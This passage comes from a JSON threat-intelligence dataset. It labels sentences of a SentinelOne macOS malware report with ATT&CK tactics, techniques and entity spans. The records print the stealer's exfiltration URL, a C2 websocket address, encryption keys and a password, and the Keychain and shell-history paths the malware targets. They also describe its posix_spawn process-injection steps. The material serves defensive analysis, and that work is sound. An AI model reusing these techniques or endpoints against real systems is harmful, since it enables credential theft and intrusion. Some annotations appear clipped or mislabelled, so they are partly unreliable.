"Persistence" } ], "techniques": [ { "id": "T1543", "name": "Create or Modify System Process" } ], "procedure": "Installer binary sets up persistence", "entities": [ { "text": "installer binary", "start": 43, "end": 59, "label": "MalwareTool" }, { "text": "esponsible for persistence setup.", "start": 144, "end": 177, "label": "Action" } ] }, { "uid": "sentinel-61_SentinelOne_report-p1-s38-b4d47c", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 38, "context_before": "The second execution chain starts with the installer binary, which is also a universal Mach-O executable compiled from Nim source code, and is responsible for persistence setup.", "sentence_text": "It drops two additional Nim-compiled binaries:\nGoogIe", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Drops two additional Nim-compiled binaries: GoogIe", "entities": [ { "text": "GoogIe", "start": 47, "end": 53, "label": "MalwareTool" }, { "text": " drops two additional Nim-compiled binaries", "start": 2, "end": 45, "label": "Action" } ] }, { "uid": "sentinel-61_SentinelOne_report-p1-s39-0f360a", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 39, "context_before": "It drops two additional Nim-compiled binaries:\nGoogIe", "sentence_text": "LLC\n(where “GoogIe” is spelled using a deceptive capital “i” rather than a lowercase ‘L’) and CoreKitAgent .", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" }, { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1036", "name": "Masquerading" }, { "id": "T1547", "name": "Boot or Logon Autostart Execution" } ], "procedure": "Drop additional binaries using deceptive naming to masquerade as legitimate software and support persistence.", "entities": [ { "text": "is spelled using a deceptive capital “i” rather than a lowercase ‘L’", "start": 20, "end": 88, "label": "Action" }, { "text": "GoogIe", "start": 12, "end": 18, "label": "MalwareTool" }, { "text": "CoreKitAgent", "start": 94, "end": 106, "label": "MalwareTool" } ] }, { "uid": "sentinel-61_SentinelOne_report-p1-s40-471262", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 40, "context_before": "LLC\n(where “GoogIe” is spelled using a deceptive capital “i” rather than a lowercase ‘L’) and CoreKitAgent .", "sentence_text": "These payloads orchestrate long-term access and recovery mechanisms for the threat actor.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": null, "procedure": "Payloads orchestrate long-term access and recovery mechanisms for the threat actor.", "entities": [ { "text": "payloads", "start": 6, "end": 14, "label": "MalwareTool" }, { "text": "orchestrate long-term access", "start": 15, "end": 43, "label": "Action" }, { "text": "recovery mechanisms", "start": 48, "end": 67, "label": "Action" }, { "text": "threat actor", "start": 76, "end": 88, "label": "ThreatActor" } ] }, { "uid": "sentinel-61_SentinelOne_report-p1-s41-c046b0", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 41, "context_before": "These payloads orchestrate long-term access and recovery mechanisms for the threat actor.", "sentence_text": "Technical Analysis of a, netchk and trojan1_arm64 Both Huntabil.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-61_SentinelOne_report-p1-s42-719def", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 42, "context_before": "Technical Analysis of a, netchk and trojan1_arm64 Both Huntabil.", "sentence_text": "IT and Huntress describe use of a C++-compiled binary with the name being deposited as a result of initial infection through the fake Zoom update scripts described earlier.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1195", "name": "Supply Chain Compromise" } ], "procedure": "Deploy C++-compiled binary via fake Zoom update scripts", "entities": [ { "text": "C++-compiled binary", "start": 34, "end": 53, "label": "MalwareTool" }, { "text": "deposited as a result of initial infection", "start": 74, "end": 116, "label": "Action" } ] }, { "uid": "sentinel-61_SentinelOne_report-p1-s43-783e66", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 43, "context_before": "IT and Huntress describe use of a C++-compiled binary with the name being deposited as a result of initial infection through the fake Zoom update scripts described earlier.", "sentence_text": "The\nbinary is\nad hoc\nsigned and carries the identifier InjectWithDyldArm64 .", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1553.001", "name": "Gatekeeper Bypass" } ], "procedure": "Ad hoc sign the binary InjectWithDyldArm64", "entities": [ { "text": "InjectWithDyldArm64", "start": 55, "end": 74, "label": "MalwareTool" }, { "text": "is\nad hoc\nsigned", "start": 11, "end": 27, "label": "Action" }, { "text": "binary", "start": 4, "end": 10, "label": "MalwareTool" } ] }, { "uid": "sentinel-61_SentinelOne_report-p1-s45-914e1a", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 45, "context_before": "In the Huntabil.", "sentence_text": "IT post, this was reported as:\n./a ./netchk", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059", "name": "Command and Scripting Interpreter" } ], "procedure": "execution of ./a and ./netchk", "entities": [ { "text": "a", "start": 33, "end": 34, "label": "MalwareTool" }, { "text": "netchk", "start": 37, "end": 43, "label": "MalwareTool" }, { "text": "./a ./netchk", "start": 31, "end": 43, "label": "Action" } ] }, { "uid": "sentinel-61_SentinelOne_report-p1-s46-ec4fb4", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 46, "context_before": "IT post, this was reported as:\n./a ./netchk", "sentence_text": "gift123$%^", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-61_SentinelOne_report-p1-s47-2be2d5", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 47, "context_before": "gift123$%^", "sentence_text": "The InjectWithDyldArm64 ( aka ) binary uses Password-Based Key Derivation Function 2 ( PBKDF2 ) with HMAC-SHA-256 to derive a 32-byte key from the password gift123$%^ , using 10000 iterations and a salt consisting of the first sixteen characters of the embedded base64 string.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-61_SentinelOne_report-p1-s48-6f047c", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 48, "context_before": "The InjectWithDyldArm64 ( aka ) binary uses Password-Based Key Derivation Function 2 ( PBKDF2 ) with HMAC-SHA-256 to derive a 32-byte key from the password gift123$%^ , using 10000 iterations and a salt consisting of the first sixteen characters of the embedded base64 string.", "sentence_text": "The derived key and the base64 decoded encrypted data are passed to the AesEncrypt function, which iterates through 16 byte blocks of the encrypted data.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-61_SentinelOne_report-p1-s49-2e0828", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 49, "context_before": "The derived key and the base64 decoded encrypted data are passed to the AesEncrypt function, which iterates through 16 byte blocks of the encrypted data.", "sentence_text": "In the first iteration the data to be encrypted is the key itself, but in subsequent iterations the input data is taken from the previous AesTrans call.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-61_SentinelOne_report-p1-s50-267104", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 50, "context_before": "In the first iteration the data to be encrypted is the key itself, but in subsequent iterations the input data is taken from the previous AesTrans call.", "sentence_text": "XORs the current encrypted data block with the current AesTrans result.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-61_SentinelOne_report-p1-s51-dd034a", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 51, "context_before": "XORs the current encrypted data block with the current AesTrans result.", "sentence_text": "SentinelLABS’ analysis shows that this process is used to decrypt two embedded binaries.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "Decrypts embedded binaries", "entities": [ { "text": "two embedded binaries", "start": 66, "end": 87, "label": "MalwareTool" }, { "text": "decrypt two embedded binaries", "start": 58, "end": 87, "label": "Action" } ] }, { "uid": "sentinel-61_SentinelOne_report-p1-s52-14bdc8", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 52, "context_before": "SentinelLABS’ analysis shows that this process is used to decrypt two embedded binaries.", "sentence_text": "The first carries an ad hoc signature and the identifier Target .", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1553.002", "name": "Code Signing" } ], "procedure": "carries an ad hoc signature", "entities": [ { "text": "The first ", "start": 0, "end": 10, "label": "MalwareTool" }, { "text": "carries an ad hoc signature", "start": 10, "end": 37, "label": "Action" }, { "text": "identifier Target", "start": 46, "end": 63, "label": "MalwareTool" } ] }, { "uid": "sentinel-61_SentinelOne_report-p1-s53-96f877", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 53, "context_before": "The first carries an ad hoc signature and the identifier Target .", "sentence_text": "The second has an ad hoc signature with the identifier trojan1_arm64 .", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-61_SentinelOne_report-p1-s54-6a30f7", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 54, "context_before": "The second has an ad hoc signature with the identifier trojan1_arm64 .", "sentence_text": "The Target binary is benign and appears to do nothing other than generate random numbers.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-61_SentinelOne_report-p1-s55-1ee414", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 55, "context_before": "The Target binary is benign and appears to do nothing other than generate random numbers.", "sentence_text": "However,\nTarget\nis spawned by InjectWithDyldArm64 in a suspended state via posix_spawnattr_init(&attrp) && !posix_spawnattr_setflags(&attrp, POSIX_SPAWN_START_SUSPENDED)\nposix_spawn(&pid, filename, 0, &attrp, argv_1, environ)\nand injected with the trojan1_arm64 binary’s code.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1055", "name": "Process Injection" } ], "procedure": "Spawn a target process in a suspended state and inject it with malicious code from trojan1_arm64 using posix_spawn mechanisms", "entities": [ { "text": "InjectWithDyldArm64", "start": 30, "end": 49, "label": "MalwareTool" }, { "text": "spawned by InjectWithDyldArm64 in a suspended state", "start": 19, "end": 70, "label": "Action" }, { "text": "injected with the trojan1_arm64 binary’s code", "start": 230, "end": 275, "label": "Action" }, { "text": "trojan1_arm64", "start": 248, "end": 261, "label": "MalwareTool" }, { "text": "Target", "start": 9, "end": 15, "label": "Infrastructure_Indicator" } ] }, { "uid": "sentinel-61_SentinelOne_report-p1-s56-29b8b6", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 56, "context_before": "However,\nTarget\nis spawned by InjectWithDyldArm64 in a suspended state via posix_spawnattr_init(&attrp) && !posix_spawnattr_setflags(&attrp, POSIX_SPAWN_START_SUSPENDED)\nposix_spawn(&pid, filename, 0, &attrp, argv_1, environ)\nand injected with the trojan1_arm64 binary’s code.", "sentence_text": "After injection, the suspended Target process is resumed via kill(pid, SIGCONT)\nand the code from the trojan1_arm64 binary is executed.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1055", "name": "Process Injection" } ], "procedure": "resume suspended process and execute trojan1_arm64 code", "entities": [ { "text": "trojan1_arm64", "start": 102, "end": 115, "label": "MalwareTool" }, { "text": " resumed", "start": 48, "end": 56, "label": "Action" }, { "text": "executed.", "start": 126, "end": 135, "label": "Action" } ] }, { "uid": "sentinel-61_SentinelOne_report-p1-s57-0b891c", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 57, "context_before": "After injection, the suspended Target process is resumed via kill(pid, SIGCONT)\nand the code from the trojan1_arm64 binary is executed.", "sentence_text": "This kind of process injection technique is rare in macOS malware and requires specific entitlements to be performed; in this case, the InjectWithDyldArm64 binary has the following entitlements to allow the injection:\ncom.apple.security.cs.debugger\ncom.apple.security.get-task-allow\nAfter first negotiating an HTTP handshake, the injected code uses wss to communicate with the C2 – another uncommon technique for macOS malware – at wss://firstfromsep[.]online/client", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" }, { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1055", "name": "Process Injection" }, { "id": "T1071.001", "name": "Application Layer Protocol: Web Protocols" } ], "procedure": "Injected code uses wss to communicate with the C2 after negotiating an HTTP handshake.", "entities": [ { "text": "process injection", "start": 13, "end": 30, "label": "Action" }, { "text": "InjectWithDyldArm64", "start": 136, "end": 155, "label": "MalwareTool" }, { "text": "negotiating an HTTP handshake", "start": 295, "end": 324, "label": "Action" }, { "text": "uses wss to communicate with the C2", "start": 344, "end": 379, "label": "Action" }, { "text": "wss://firstfromsep[.]online/client", "start": 432, "end": 466, "label": "Infrastructure_Indicator" } ] }, { "uid": "sentinel-61_SentinelOne_report-p1-s58-c90fd9", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 58, "context_before": "This kind of process injection technique is rare in macOS malware and requires specific entitlements to be performed; in this case, the InjectWithDyldArm64 binary has the following entitlements to allow the injection:\ncom.apple.security.cs.debugger\ncom.apple.security.get-task-allow\nAfter first negotiating an HTTP handshake, the injected code uses wss to communicate with the C2 – another uncommon technique for macOS malware – at wss://firstfromsep[.]online/client", "sentence_text": "The malware uses multiple levels of RC4 encryption in combination with the base64 encoding and three different keys before the communication.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "uses multiple levels of RC4 encryption with base64 encoding before communication", "entities": [ { "text": "The malware", "start": 0, "end": 11, "label": "MalwareTool" }, { "text": "uses multiple levels of RC4 encryption", "start": 12, "end": 50, "label": "Action" }, { "text": " uses multiple levels of RC4 encryption in combination with the base64 encoding and three different keys before the communication.", "start": 11, "end": 141, "label": "Action" } ] }, { "uid": "sentinel-61_SentinelOne_report-p1-s59-474dd1", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 59, "context_before": "The malware uses multiple levels of RC4 encryption in combination with the base64 encoding and three different keys before the communication.", "sentence_text": "Our analysis found that the communication messages from the C2 use a JSON format of {\"name\":\"\",\"payload\":\"\",\"target\":\"\"} .", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-61_SentinelOne_report-p1-s60-c648ca", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 60, "context_before": "Our analysis found that the communication messages from the C2 use a JSON format of {\"name\":\"\",\"payload\":\"\",\"target\":\"\"} .", "sentence_text": "We suspect the target field is used for the victim identifier.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-61_SentinelOne_report-p1-s61-45f5b9", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 61, "context_before": "We suspect the target field is used for the victim identifier.", "sentence_text": "When the\nmessage\nvalue is used, the payload field value is encrypted using the key 3LZu5H$yF^FSwPu3SqbL*sK .", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1001", "name": "Data Obfuscation" } ], "procedure": "payload field value is encrypted using the key 3LZu5H$yF^FSwPu3SqbL*sK", "entities": [ { "text": "3LZu5H$yF^FSwPu3SqbL*sK .", "start": 83, "end": 108, "label": "Infrastructure_Indicator" }, { "text": "encrypted ", "start": 59, "end": 69, "label": "Action" } ] }, { "uid": "sentinel-61_SentinelOne_report-p1-s62-095ab8", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 62, "context_before": "When the\nmessage\nvalue is used, the payload field value is encrypted using the key 3LZu5H$yF^FSwPu3SqbL*sK .", "sentence_text": "The payload has the JSON structure {\"cmd\":, \"data\":\"\"} where the cmd field contains an int value for the command to be executed.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071", "name": "Application Layer Protocol" } ], "procedure": "payload contains command to be executed in JSON structure", "entities": [ { "text": "{\"cmd\":, \"data\":\"\"}", "start": 35, "end": 54, "label": "Infrastructure_Indicator" }, { "text": "command to be executed", "start": 105, "end": 127, "label": "Action" } ] }, { "uid": "sentinel-61_SentinelOne_report-p1-s63-f4cc12", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 63, "context_before": "The payload has the JSON structure {\"cmd\":, \"data\":\"\"} where the cmd field contains an int value for the command to be executed.", "sentence_text": "Available commands we were able to identify in trojan1_arm64 were as follows:\nThe result of an executed command is returned to the C2 in the payload field, now having the form {\"cmd\":,\"err\":,\"data\":\"\"} , where cmd contains the int value related to the command that was executed, err contains an int value related to success or failure, and data contains the results of the executed command.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071", "name": "Application Layer Protocol" } ], "procedure": "malware executes command and returns result to C2 in JSON payload", "entities": [ { "text": "trojan1_arm64", "start": 47, "end": 60, "label": "MalwareTool" }, { "text": "{\"cmd\":,\"err\":,\"data\":\"\"}", "start": 176, "end": 201, "label": "Infrastructure_Indicator" }, { "text": "executed command is returned to the C2", "start": 95, "end": 133, "label": "Action" } ] }, { "uid": "sentinel-61_SentinelOne_report-p1-s64-602aa9", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 64, "context_before": "Available commands we were able to identify in trojan1_arm64 were as follows:\nThe result of an executed command is returned to the C2 in the payload field, now having the form {\"cmd\":,\"err\":,\"data\":\"\"} , where cmd contains the int value related to the command that was executed, err contains an int value related to success or failure, and data contains the results of the executed command.", "sentence_text": "For example, when a getSysInfo command is executed, the data field will be populated with values in a JSON structure of the form {\"boottime\":,\"username\":\"\",\"version\":\"\",\"comname\":\"\",\"platform\":\"\",\"arch\":\"\"} The whole JSON message is encrypted using the key lZjJ7iuK2qcmMW6hacZOw62 Data Stealing Bash Scripts", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1082", "name": "System Information Discovery" } ], "procedure": "malware executes getSysInfo command and populates encrypted JSON payload with system info for C2", "entities": [ { "text": "Data Stealing Bash Scripts", "start": 281, "end": 307, "label": "MalwareTool" }, { "text": "SON structure of the form {\"boottime\":,\"username\":\"\",\"version\":\"\",\"comname\":\"\",\"platform\":\"\",\"arch\":\"\"}", "start": 103, "end": 206, "label": "Infrastructure_Indicator" }, { "text": "lZjJ7iuK2qcmMW6hacZOw62 Data Stealing Bash Scripts", "start": 257, "end": 307, "label": "Infrastructure_Indicator" }, { "text": "getSysInfo command is executed, the data field will be populated with values in a JSON structure", "start": 20, "end": 116, "label": "Action" } ] }, { "uid": "sentinel-61_SentinelOne_report-p1-s65-a54225", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 65, "context_before": "For example, when a getSysInfo command is executed, the data field will be populated with values in a JSON structure of the form {\"boottime\":,\"username\":\"\",\"version\":\"\",\"comname\":\"\",\"platform\":\"\",\"arch\":\"\"} The whole JSON message is encrypted using the key lZjJ7iuK2qcmMW6hacZOw62 Data Stealing Bash Scripts", "sentence_text": "The script targets data from the following browsers:\nArc\nBrave\nFirefox\nGoogle Chrome\nBrowser data is copied to /private/var/tmp/uplex_//", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1071.001", "name": "Web Protocols" } ], "procedure": "malware collects browser data from Arc, Brave, Firefox, and Google Chrome and stores it locally in /private/var/tmp/uplex_//", "entities": [ { "text": "The script", "start": 0, "end": 10, "label": "MalwareTool" }, { "text": "/private/var/tmp/uplex_//", "start": 111, "end": 155, "label": "Infrastructure_Indicator" }, { "text": "targets data", "start": 11, "end": 23, "label": "Action" }, { "text": "Browser data is copied ", "start": 85, "end": 108, "label": "Action" }, { "text": "Arc\nBrave\nFirefox\nGoogle Chrome", "start": 53, "end": 84, "label": "Infrastructure_Indicator" } ] }, { "uid": "sentinel-61_SentinelOne_report-p1-s66-9853db", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 66, "context_before": "The script targets data from the following browsers:\nArc\nBrave\nFirefox\nGoogle Chrome\nBrowser data is copied to /private/var/tmp/uplex_//", "sentence_text": "The script also targets the following Keychain and shell files and directories:\n/Library/Keychains/System.keychain\n~/Library/Keychains/login.keychain-db\n~/.bash_history\n~/.zsh_history\n~/.zsh/", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" }, { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1005", "name": "Data from Local System" } ], "procedure": "malware collects sensitive Keychain and shell history files from /Library/Keychains/System.keychain, ~/Library/Keychains/login.keychain-db, ~/.bash_history, ~/.zsh_history, and ~/.zsh/", "entities": [ { "text": "script", "start": 4, "end": 10, "label": "MalwareTool" }, { "text": "/Library/Keychains/System.keychain\n~/Library/Keychains/login.keychain-db\n~/.bash_history\n~/.zsh_history\n~/.zsh/", "start": 80, "end": 191, "label": "Infrastructure_Indicator" }, { "text": "targets the following Keychain", "start": 16, "end": 46, "label": "Action" }, { "text": "shell files and directories", "start": 51, "end": 78, "label": "Action" } ] }, { "uid": "sentinel-61_SentinelOne_report-p1-s67-b18e86", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 67, "context_before": "The script also targets the following Keychain and shell files and directories:\n/Library/Keychains/System.keychain\n~/Library/Keychains/login.keychain-db\n~/.bash_history\n~/.zsh_history\n~/.zsh/", "sentence_text": "The data is then compressed via ditto -ck and posted to the C2 using curl The tlgrm script steals Telegram’s encrypted local database ( postbox/db ) and the decryption key blob, .tempkeyEncrypted , presumably for offline decryption or brute force attempts.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" }, { "id": "TA0010", "name": "Exfiltration" } ], "techniques": [ { "id": "T1005", "name": "Data from Local System" }, { "id": "T1567.002", "name": "Exfiltration to Cloud Storage" } ], "procedure": "tlgrm script steals Telegram local database (postbox/db) and decryption key blob (.tempkeyEncrypted), compresses the data with ditto -ck, and posts it to C2 via curl", "entities": [ { "text": "tlgrm script", "start": 78, "end": 90, "label": "MalwareTool" }, { "text": "C2", "start": 60, "end": 62, "label": "Infrastructure_Indicator" }, { "text": "postbox/db", "start": 136, "end": 146, "label": "Infrastructure_Indicator" }, { "text": ".tempkeyEncrypted ", "start": 178, "end": 196, "label": "Infrastructure_Indicator" }, { "text": "compressed", "start": 17, "end": 27, "label": "Action" }, { "text": "steals Telegram’s encrypted local database", "start": 91, "end": 133, "label": "Action" }, { "text": "posted", "start": 46, "end": 52, "label": "Action" } ] }, { "uid": "sentinel-61_SentinelOne_report-p1-s68-266bd8", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 68, "context_before": "The data is then compressed via ditto -ck and posted to the C2 using curl The tlgrm script steals Telegram’s encrypted local database ( postbox/db ) and the decryption key blob, .tempkeyEncrypted , presumably for offline decryption or brute force attempts.", "sentence_text": "The Telegram data is exfiltrated to the same server used in the upl script.", "relevant": "yes", "tactic": [ { "id": "TA0010", "name": "Exfiltration" } ], "techniques": [ { "id": "T1567.002", "name": "Exfiltration to Cloud Storage" } ], "procedure": "Exfiltrates Telegram data to C2 server used by upl script", "entities": [ { "text": "upl script.", "start": 64, "end": 75, "label": "MalwareTool" }, { "text": "same server used in the upl script.", "start": 40, "end": 75, "label": "Infrastructure_Indicator" }, { "text": "exfiltrated", "start": 21, "end": 32, "label": "Action" } ] }, { "uid": "sentinel-61_SentinelOne_report-p1-s69-da4f94", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 69, "context_before": "The Telegram data is exfiltrated to the same server used in the upl script.", "sentence_text": "The uploadData()\nfunction in both scripts is identical save for one variable name used to specify the server address:\nhostName\nin\nupl\nand\nserverUrl\nin\ntlgrm\nupl:\nhostName=\"https[:]//dataupload[.]store/uploadfiles\"\ntlgrm:\nserverUrl=\"https[:]//dataupload[.]store/uploadfiles\"\nOur investigation found related scripts in public malware repositories that may be tied to similar attacks.", "relevant": "yes", "tactic": [ { "id": "TA0010", "name": "Exfiltration" } ], "techniques": [ { "id": "T1567.002", "name": "Exfiltration to Cloud Storage" } ], "procedure": "Exfiltrates data using uploadData() function in upl and tlgrm scripts to attacker-controlled server", "entities": [ { "text": "tlgrm", "start": 214, "end": 219, "label": "MalwareTool" }, { "text": "upl", "start": 130, "end": 133, "label": "MalwareTool" }, { "text": "hostName=\"https[:]//dataupload[.]store/uploadfiles", "start": 162, "end": 212, "label": "Infrastructure_Indicator" }, { "text": "serverUrl=\"https[:]//dataupload[.]store/uploadfiles", "start": 221, "end": 272, "label": "Infrastructure_Indicator" }, { "text": " uploadData()\nfunction", "start": 3, "end": 25, "label": "Action" } ] }, { "uid": "sentinel-61_SentinelOne_report-p1-s70-2be5a3", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 70, "context_before": "The uploadData()\nfunction in both scripts is identical save for one variable name used to specify the server address:\nhostName\nin\nupl\nand\nserverUrl\nin\ntlgrm\nupl:\nhostName=\"https[:]//dataupload[.]store/uploadfiles\"\ntlgrm:\nserverUrl=\"https[:]//dataupload[.]store/uploadfiles\"\nOur investigation found related scripts in public malware repositories that may be tied to similar attacks.", "sentence_text": "The second part of the attack chain begins with the installer binary dropped alongside by the initial access scripts.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1204", "name": "User Execution" }, { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Drops installer binary as the next stage following initial access scripts", "entities": [ { "text": "installer binary", "start": 52, "end": 68, "label": "MalwareTool" }, { "text": "dropped alongside by the initial access scripts", "start": 69, "end": 116, "label": "Action" } ] }, { "uid": "sentinel-61_SentinelOne_report-p1-s71-86f56e", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 71, "context_before": "The second part of the attack chain begins with the installer binary dropped alongside by the initial access scripts.", "sentence_text": "Compiled from Nim and weighing in at ~233KB, the installer binary is a universal architecture Mach-O with an ad hoc signature and the identifier user_startup_installer_arm64", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-61_SentinelOne_report-p1-s72-719608", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 72, "context_before": "Compiled from Nim and weighing in at ~233KB, the installer binary is a universal architecture Mach-O with an ad hoc signature and the identifier user_startup_installer_arm64", "sentence_text": "The installer binary checks for the existence of a LaunchAgent at [~]/Library/LaunchAgents/com.google.update.plist and creates folder paths at [~]/Library/CoreKit/ and [~]/Library/Application Support/GoogIe LLC/ for use by the later stages described in the following sections.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1543.001", "name": "Launch Agent" } ], "procedure": "Checks for LaunchAgent existence and creates directories for later stages", "entities": [ { "text": "installer binary", "start": 4, "end": 20, "label": "MalwareTool" }, { "text": "[~]/Library/LaunchAgents/com.google.update.plist", "start": 66, "end": 114, "label": "Infrastructure_Indicator" }, { "text": "[~]/Library/CoreKit/", "start": 143, "end": 163, "label": "Infrastructure_Indicator" }, { "text": " [~]/Library/Application Support/GoogIe LLC/", "start": 167, "end": 211, "label": "Infrastructure_Indicator" }, { "text": "checks for the existence of a LaunchAgent at", "start": 21, "end": 65, "label": "Action" }, { "text": " creates folder paths ", "start": 118, "end": 140, "label": "Action" } ] }, { "uid": "sentinel-61_SentinelOne_report-p1-s73-50b979", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 73, "context_before": "The installer binary checks for the existence of a LaunchAgent at [~]/Library/LaunchAgents/com.google.update.plist and creates folder paths at [~]/Library/CoreKit/ and [~]/Library/Application Support/GoogIe LLC/ for use by the later stages described in the following sections.", "sentence_text": "The misspelling of GoogIe LLC (uppercase ‘i’, not lowercase ‘L’) is intended to help the malware blend in and avoid suspicion.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036.005", "name": "Match Legitimate Resource Name or Location" } ], "procedure": "Uses a misspelled folder name to blend in and evade detection", "entities": [ { "text": "malware", "start": 89, "end": 96, "label": "MalwareTool" }, { "text": "GoogIe LLC", "start": 19, "end": 29, "label": "Infrastructure_Indicator" }, { "text": "intended to help the malware blend in and avoid suspicion", "start": 68, "end": 125, "label": "Action" } ] }, { "uid": "sentinel-61_SentinelOne_report-p1-s74-2d32f3", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 74, "context_before": "The misspelling of GoogIe LLC (uppercase ‘i’, not lowercase ‘L’) is intended to help the malware blend in and avoid suspicion.", "sentence_text": "An interesting feature of this and the other compiled Nim binaries is the existence of code that at first blush could be mistaken for C2 command options.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-61_SentinelOne_report-p1-s75-322517", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 75, "context_before": "An interesting feature of this and the other compiled Nim binaries is the existence of code that at first blush could be mistaken for C2 command options.", "sentence_text": "Huntress researchers also reported observing a subset of these 